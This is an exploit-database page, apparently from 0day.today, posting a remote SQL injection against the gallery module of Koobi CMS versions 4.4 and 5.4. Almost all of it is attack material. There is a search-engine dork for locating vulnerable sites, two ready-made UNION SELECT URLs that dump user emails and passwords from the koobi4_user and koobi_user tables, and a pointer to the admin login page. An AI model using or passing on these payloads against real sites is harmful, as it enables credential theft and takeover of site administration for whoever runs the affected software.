[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2856
Category
web applications
Date add
07-04-2008
Platform
unsorted
========================================================
Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability
========================================================




##########################################
#
# Koobi v4.4,V5.4 gallery (img_id)
#
ONLY 4.4 AND 5.4
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=gallerypic img_id"

###########################################
EXPLOiT 1:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user

EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user



admin login=admin/login.php

password under page

###########################################



#  0day.today [2024-11-16]  #